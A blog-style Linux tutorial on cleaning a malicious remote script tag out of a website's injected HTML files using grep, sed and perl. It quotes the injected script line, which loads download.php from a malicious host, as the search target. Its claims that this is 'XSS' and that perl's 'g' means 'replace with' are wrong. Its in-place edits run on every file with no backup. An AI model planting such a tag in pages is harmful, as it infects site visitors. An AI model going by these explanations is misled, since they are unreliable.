Linux: Remove Specific String in Text Files

Webmaster usually can get headache when their website’s static page like HTML, JS and CSS being injected with some kind of malicious code. You will see some iframe tag or source tag inside your HTML coding and some of it has caused your website being classified by Google and Firefox as ‘harmful’.

We called this as XSS attack (cross site-scripting; X means cross) which enable attackers to inject client-side script into the web pages viewed by other users. Usually it caused by permission of your web files is globally writable. You can find out more about this attack at Wikipedia, since here I just showing you some way to find and remove the injected scripts.

I am using following variables:

Infected user: user1
User’s web directory: /home/user1/public_html

1. Usually, you will received a report regards to your website has been listed as harmful or ‘Reported Attack Site’ as below:

2. Click the ‘Why was this site blocked?’ and then you will be redirected to Google Safe Browsing page. This website will tell you what malicious software has been hosted, or being injected into your code. Lets say in this case, the values is rysawek.cz.cc

3. Lets identified where its start in our web server. To do this, you need to scan you website directory using following command. Login via SSH/console and execute following command:

grep -lir "rysawek.cz.cc" /home/user1/public_html/*

4. If you got some results, means the system has found files which has that word. Lets open the files using text editor and double confirm on this:

vi /home/user1/public_html/index.html

You will see something like below:

.....
<script src=http://rysawek.cz.cc/web/fol/download.php ></script>
.....

5. We need to remove that line from the files. You can remove the line using text editor, one by one, but what if you have many infected files after scan? So you need to have some command to help you automate this task.

If you find the code is reside in one single line, we can delete the whole line all together:

cd /home/user1/public_html
find ./ -name "*" | xargs sed -i '/rysawek.cz.cc/d' | awk '$1'

If you find the code is embedded with your HTML code (which is not in single line), its not advisable to delete the whole line because it can surely mess up your website. You can delete the specific string with some help from Perl and RegEx argument:

cd /home/user1/public_html
find ./ -name "*" | xargs perl -w -i -p -e "s/<script src=http:\/\/rysawek.cz.cc\/web\/fol\/download.php ><\/script>//g"

The ‘find’ command above will find any string start with what you define after ‘s/’ until the second last slash. Since we want to replace with nothing(just remove the string), so between last slash and second last slash, we will put blank value. The last ‘g’ means replace with. Don’t forget to escape the ‘/’ value with ‘\/’ to make sure Perl understand that your string contains ‘/’.

Lets share if you have better or more simple way to do this. Cheers!

Leave a comment

Leave a Reply

Your email address will not be published. Required fields are marked *